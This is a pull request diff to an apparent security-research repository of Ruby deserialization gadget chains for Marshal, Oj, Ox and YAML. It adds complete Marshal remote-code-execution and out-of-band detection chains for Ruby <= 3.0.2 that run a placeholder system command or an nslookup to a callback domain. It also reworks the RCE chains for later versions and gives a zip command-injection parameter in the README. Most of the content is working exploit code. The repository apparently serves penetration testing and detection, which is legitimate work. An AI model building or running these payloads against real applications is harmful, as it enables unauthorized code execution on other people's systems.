### PR TITLE
Automation improvments and adding chain <= 3.0.2 and 

### DIFF
--- a/README.md
+++ b/README.md
@@ -23,8 +23,9 @@ The Oj, Ox and Psych proof of concepts were observed to work up to the current R
 
 The subfolders for Oj, Ox and YAML contain gadget chains for the detection of an exploitable sink and remote code execution.
 
-* The **detection gadget chain** calls an URL when flowing into a vulnerable sink. For this to work the placeholder `{CALLBACK_URL}` has to be replaced with an URL which should be called (preferably under the control of the tester).
-* The **remote code execution (RCE) gadget chain** makes use of the `zip` command line util to run arbitrary commands (see [GTFObins](https://gtfobins.github.io/gtfobins/zip/)). Replace the placeholder `{ZIP_PARAM}` with a zip parameter that executes a command such as `-TmTT=\"$(id>/tmp/deser-poc)\"any.zip` (which will write the output of `id` to `/tmp/deser-poc`).
-
+* The **detection gadget chain** calls an URL when flowing into a vulnerable sink. For this to work the placeholder `{CALLBACK_DOMAIN}` has to be replaced with a domain which should be called (preferably under the control of the tester).
+* The **remote code execution (RCE) gadget chain**:
+    * makes use of the `zip` command line util to run arbitrary commands (see [GTFObins](https://gtfobins.github.io/gtfobins/zip/)). Replace the placeholder `{ZIP_PARAM}` with a zip parameter that executes a command such as `-TmTT=\"$(id>/tmp/deser-poc)\"any.zip` (which will write the output of `id` to `/tmp/deser-poc`).
+    * for chain <= 3.0.2, replace the placeholder `{COMMAND}` with a system command like `id`.
 
 See the Ruby files in the respective subfolders for more information.

--- a/marshal/3.0.2/marshal-detection-ruby-3.0.2.rb
+++ b/marshal/3.0.2/marshal-detection-ruby-3.0.2.rb
@@ -1,0 +1,42 @@
+# From: https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
+
+# Autoload the required classes
+Gem::SpecFetcher
+Gem::Installer
+
+# prevent the payload from running when we Marshal.dump it
+module Gem
+  class Requirement
+    def marshal_dump
+      [@requirements]
+    end
+  end
+end
+
+wa1 = Net::WriteAdapter.new(Kernel, :system)
+
+rs = Gem::RequestSet.allocate
+rs.instance_variable_set('@sets', wa1)
+# Replace {CALLBACK_DOMAIN} with a out of band callback domain
+rs.instance_variable_set('@git_set', "nslookup {CALLBACK_DOMAIN}")
+
+wa2 = Net::WriteAdapter.new(rs, :resolve)
+
+i = Gem::Package::TarReader::Entry.allocate
+i.instance_variable_set('@read', 0)
+i.instance_variable_set('@header', "aaa")
+
+
+n = Net::BufferedIO.allocate
+n.instance_variable_set('@io', i)
+n.instance_variable_set('@debug_output', wa2)
+
+t = Gem::Package::TarReader.allocate
+t.instance_variable_set('@io', n)
+
+r = Gem::Requirement.allocate
+r.instance_variable_set('@requirements', t)
+
+payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
+puts payload.unpack("H*")
+#puts Marshal.load(payload)

--- a/marshal/3.0.2/marshal-rce-ruby-3.0.2.rb
+++ b/marshal/3.0.2/marshal-rce-ruby-3.0.2.rb
@@ -1,0 +1,42 @@
+# From: https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
+
+# Autoload the required classes
+Gem::SpecFetcher
+Gem::Installer
+
+# prevent the payload from running when we Marshal.dump it
+module Gem
+  class Requirement
+    def marshal_dump
+      [@requirements]
+    end
+  end
+end
+
+wa1 = Net::WriteAdapter.new(Kernel, :system)
+
+rs = Gem::RequestSet.allocate
+rs.instance_variable_set('@sets', wa1)
+# Replace {COMMAND} with desired command like "id"
+rs.instance_variable_set('@git_set', "{COMMAND}")
+
+wa2 = Net::WriteAdapter.new(rs, :resolve)
+
+i = Gem::Package::TarReader::Entry.allocate
+i.instance_variable_set('@read', 0)
+i.instance_variable_set('@header', "aaa")
+
+
+n = Net::BufferedIO.allocate
+n.instance_variable_set('@io', i)
+n.instance_variable_set('@debug_output', wa2)
+
+t = Gem::Package::TarReader.allocate
+t.instance_variable_set('@io', n)
+
+r = Gem::Requirement.allocate
+r.instance_variable_set('@requirements', t)
+
+payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
+puts payload.unpack("H*")
+#puts Marshal.load(payload)

--- a/marshal/3.2.4/marshal-detection-ruby-3.2.4.rb
+++ b/marshal/3.2.4/marshal-detection-ruby-3.2.4.rb
@@ -1,0 +1,57 @@
+# Disclaimer:
+# This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, 
+# and is not intended to be used to attack systems except where explicitly authorized.
+# Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
+
+# This Ruby marshall unsafe deserialization proof of concept is originally based on: https://devcraft.io/2022/04/04/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
+# It was observed to work up to Ruby 3.2.4
+
+Gem::SpecFetcher # Autoload 
+
+
+def call_url_and_create_folder(url) # provided url should not have a query (?) component
+  uri = URI::HTTP.allocate
+  uri.instance_variable_set("@path", "/")
+  uri.instance_variable_set("@scheme", "s3")
+  uri.instance_variable_set("@host", url + "?")  # use the https host+path with your rz file
+  uri.instance_variable_set("@port", "/../../../../../../../../../../../../../../../tmp/cache/bundler/git/any-c5fe0200d1c7a5139bd18fd22268c4ca8bf45e90/") # c5fe... is the SHA-1 of "any"
+  uri.instance_variable_set("@user", "any")
+  uri.instance_variable_set("@password", "any")
+
+  source = Gem::Source.allocate
+  source.instance_variable_set("@uri", uri)
+  source.instance_variable_set("@update_cache", true)
+
+  index_spec = Gem::Resolver::IndexSpecification.allocate
+  index_spec.instance_variable_set("@name", "name")
+  index_spec.instance_variable_set("@source", source)
+
+  request_set = Gem::RequestSet.allocate
+  request_set.instance_variable_set("@sorted_requests", [index_spec])
+
+  lockfile = Gem::RequestSet::Lockfile.allocate
+  lockfile.instance_variable_set("@set", request_set)
+  lockfile.instance_variable_set("@dependencies", [])
+
+  return lockfile
+end
+
+def to_s_wrapper(inner)
+  spec = Gem::Specification.new
+  spec.instance_variable_set("@new_platform", inner)
+  return spec
+end
+
+def create_detection_gadget_chain(url)
+  call_url_gadget = call_url_and_create_folder(url)
+
+  return Marshal.dump([Gem::SpecFetcher, to_s_wrapper(call_url_gadget)])
+end
+
+url = "{CALLBACK_URL}" # replace with URL to call in the detection gadget, for example: test.example.org/path, url should not have a query (?) component.
+detection_gadget_chain = create_detection_gadget_chain(url)
+
+#puts "Detection gadget chain using callback URL #{url}:"
+puts detection_gadget_chain.unpack("H*")
+
+#Marshal.load(detection_gadget_chain) # caution: will trigger the detection gadget when uncommented.

--- a/marshal/3.2.4/marshal-detection-ruby-3.2.4.rb
+++ b/marshal/3.2.4/marshal-detection-ruby-3.2.4.rb
@@ -48,7 +48,7 @@ def create_detection_gadget_chain(url)
   return Marshal.dump([Gem::SpecFetcher, to_s_wrapper(call_url_gadget)])
 end
 
-url = "{CALLBACK_URL}" # replace with URL to call in the detection gadget, for example: test.example.org/path, url should not have a query (?) component.
+url = "{CALLBACK_DOMAIN}" # replace with URL to call in the detection gadget, for example: test.example.org/path, url should not have a query (?) component.
 detection_gadget_chain = create_detection_gadget_chain(url)
 
 #puts "Detection gadget chain using callback URL #{url}:"

--- a/marshal/3.2.4/marshal-rce-ruby-3.2.4.rb
+++ b/marshal/3.2.4/marshal-rce-ruby-3.2.4.rb
@@ -85,19 +85,11 @@ def create_rce_gadget_chain(rz_url_to_load, zip_param_to_execute)
   return Marshal.dump([Gem::SpecFetcher, to_s_wrapper(create_folder_gadget), to_s_wrapper(exec_gadget)])
 end
 
-def create_detection_gadget_chain(url)
-  call_url_gadget = call_url_and_create_folder(url)
+# replace with parameter that is provided to the zip executable and can contain a command passed to the -TT param (unzip command), for example: "-TmTT=\"$(id>/tmp/marshal-poc)\"any.zip"
+#For example: zip_param_to_execute = "-TmTT=\"$(id>/tmp/marshal-poc)\"any.zip"
+zip_param_to_execute = "{ZIP_PARAM}"
+rce_gadget_chain = create_rce_gadget_chain("rubygems.org/quick/Marshal.4.8/bundler-2.2.27.gemspec.rz", zip_param_to_execute)
 
-  return Marshal.dump([Gem::SpecFetcher, to_s_wrapper(call_url_gadget)])
-end
+puts rce_gadget_chain.unpack("H*")
 
-url = "" # replace with URL to call in the detection gadget, for example: test.example.org/path, url should not have a query (?) component.
-detection_gadget_chain = create_detection_gadget_chain(url)
-
-#zip_param_to_execute = "" # replace with parameter that is provided to the zip executable and can contain a command passed to the -TT param (unzip command), for example: "-TmTT=\"$(id>/tmp/marshal-poc)\"any.zip"
-#rce_gadget_chain = create_rce_gadget_chain("rubygems.org/quick/Marshal.4.8/bundler-2.2.27.gemspec.rz", zip_param_to_execute)
-
-puts "Detection gadget chain using callback URL #{url}:"
-puts detection_gadget_chain.unpack("H*")
-
-#Marshal.load(detection_gadget_chain) # caution: will trigger the detection gadget when uncommented.
+#Marshal.load(rce_gadget_chain) # caution: will trigger the detection gadget when uncommented.

--- a/marshal/3.4-rc/marshal-detection-ruby-3.4-rc.rb
+++ b/marshal/3.4-rc/marshal-detection-ruby-3.4-rc.rb
@@ -61,7 +61,7 @@ def create_detection_gadget_chain(url)
   return Marshal.dump([Gem::SpecFetcher, to_s_wrapper(call_url_gadget)])
 end
 
-url =  "{CALLBACK_URL}" # replace with URL to call in the detection gadget, for example: test.example.org/path, url should not have a query (?) component.
+url =  "{CALLBACK_DOMAIN}" # replace with URL to call in the detection gadget, for example: test.example.org/path, url should not have a query (?) component.
 detection_gadget_chain = create_detection_gadget_chain(url)
 
 # begin

--- a/marshal/3.4-rc/marshal-detection-ruby-3.4-rc.rb
+++ b/marshal/3.4-rc/marshal-detection-ruby-3.4-rc.rb
@@ -14,42 +14,33 @@ require 'net/http'
 
 Gem::SpecFetcher # Autoload 
 
-def git_gadget(executable, second_param)
-  git_source = Gem::Source::Git.allocate
-  git_source.instance_variable_set("@git", executable)
-  git_source.instance_variable_set("@reference", second_param)
-  git_source.instance_variable_set("@root_dir", "/tmp")
-  git_source.instance_variable_set("@repository", "any")
-  git_source.instance_variable_set("@name", "any")
 
-  spec = Gem::Resolver::Specification.allocate
-  spec.instance_variable_set("@name", "any")
-  spec.instance_variable_set("@dependencies",[])
+def call_url_and_create_folder(url) # provided url should not have a query (?) component
+  uri = URI::HTTP.allocate
+  uri.instance_variable_set("@path", "/")
+  uri.instance_variable_set("@scheme", "s3")
+  uri.instance_variable_set("@host", url + "?")  # use the https host+path with your rz file
+  uri.instance_variable_set("@port", "/../../../../../../../../../../../../../../../tmp/cache/bundler/git/any-c5fe0200d1c7a5139bd18fd22268c4ca8bf45e90/") # c5fe... is the SHA-1 of "any"
+  uri.instance_variable_set("@user", "any")
+  uri.instance_variable_set("@password", "any")
 
-  git_spec = Gem::Resolver::GitSpecification.allocate
-  git_spec.instance_variable_set("@source", git_source)
-  git_spec.instance_variable_set("@spec", spec)
+  source = Gem::Source.allocate
+  source.instance_variable_set("@uri", uri)
+  source.instance_variable_set("@update_cache", true)
 
-  spec_specification = Gem::Resolver::SpecSpecification.allocate
-  spec_specification.instance_variable_set("@spec", git_spec)
-
-  return spec_specification
-end
-
-def command_gadget(zip_param_to_execute)
-  git_gadget_create_zip = git_gadget("zip", "/etc/passwd")
-  git_gadget_execute_cmd = git_gadget("zip", zip_param_to_execute)
+  index_spec = Gem::Resolver::IndexSpecification.allocate
+  index_spec.instance_variable_set("@name", "name")
+  index_spec.instance_variable_set("@source", source)
 
   request_set = Gem::RequestSet.allocate
-  request_set.instance_variable_set("@sorted_requests", [git_gadget_create_zip, git_gadget_execute_cmd])
+  request_set.instance_variable_set("@sorted_requests", [index_spec])
 
   lockfile = Gem::RequestSet::Lockfile.new('','','')
   lockfile.instance_variable_set("@set", request_set)
-  lockfile.instance_variable_set("@dependencies",[])
+  lockfile.instance_variable_set("@dependencies", [])
 
   return lockfile
 end
-
 
 # This is the major change compared to the other gadget.
 # Essentially the Gem::Specification is calling safe_load which blocks the execution of the chain.
@@ -63,18 +54,19 @@ def to_s_wrapper(inner)
   return spec
 end
 
-# RCE
-def create_rce_gadget_chain(zip_param_to_execute)
-  exec_gadget = command_gadget(zip_param_to_execute)
+# detection / folder creation
+def create_detection_gadget_chain(url)
+  call_url_gadget = call_url_and_create_folder(url)
 
-  return Marshal.dump([Gem::SpecFetcher, to_s_wrapper(exec_gadget)])
+  return Marshal.dump([Gem::SpecFetcher, to_s_wrapper(call_url_gadget)])
 end
 
-# You can comment from here if you want to simply detect the presence of the vulnerability.
-#For example: zip_param_to_execute = "-TmTT=\"$(id>/tmp/marshal-poc)\"any.zip"
-zip_param_to_execute = "{ZIP_PARAM}"
-rce_gadget_chain = create_rce_gadget_chain(zip_param_to_execute)
+url =  "{CALLBACK_URL}" # replace with URL to call in the detection gadget, for example: test.example.org/path, url should not have a query (?) component.
+detection_gadget_chain = create_detection_gadget_chain(url)
 
-puts rce_gadget_chain.unpack("H*")
+# begin
+  # Marshal.load(detection_gadget_chain)
+  # rescue
+# end
 
-# Marshal.load(rce_gadget_chain)
+puts detection_gadget_chain.unpack("H*")

--- a/oj/3.3/oj-detection-ruby-3.3.json
+++ b/oj/3.3/oj-detection-ruby-3.3.json
@@ -13,7 +13,7 @@
                         "^o": "Gem::Source",
                         "uri": {
                           "^o": "URI::HTTP",
-                          "host": "{CALLBACK_URL}?",
+                          "host": "{CALLBACK_DOMAIN}?",
                           "port": "any",
                           "scheme": "s3", "path": "/", "user": "any", "password": "any"
                         }}}]},

--- a/ox/3.3/ox-detection-ruby-3.3.xml
+++ b/ox/3.3/ox-detection-ruby-3.3.xml
@@ -14,7 +14,7 @@
                     <o a="@uri" c="URI::HTTP">
                         <s a="@path">/</s>
                         <s a="@scheme">s3</s>
-                        <s a="@host">{CALLBACK_URL}?</s>
+                        <s a="@host">{CALLBACK_DOMAIN}?</s>
                         <s a="@port">any</s>
                         <s a="@user">any</s>
                         <s a="@password">any</s>

--- a/yaml/3.3/yaml-detection-ruby-3.3.yml
+++ b/yaml/3.3/yaml-detection-ruby-3.3.yml
@@ -11,7 +11,7 @@
                   uri: !ruby/object:URI::HTTP
                     path: "/"
                     scheme: s3
-                    host: {CALLBACK_URL}?
+                    host: {CALLBACK_DOMAIN}?
                     port: "any"
                     user: any
                     password: any


### PR DESCRIPTION
Making improvements for automation usage of this repo:
* Removing "prints" in some chains
* Adding {ZIP_PARAM} and {CALLBACK_URL} in marshal chains
* Splitting marshal chains in rce and detection types
* Replacing {CALLBACK_URL} with {CALLBACK_DOMAIN} because it is not a full URL and we just need a callback domain to detect the deserialization
* Adding chain marshal <= 3.0.2 from https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html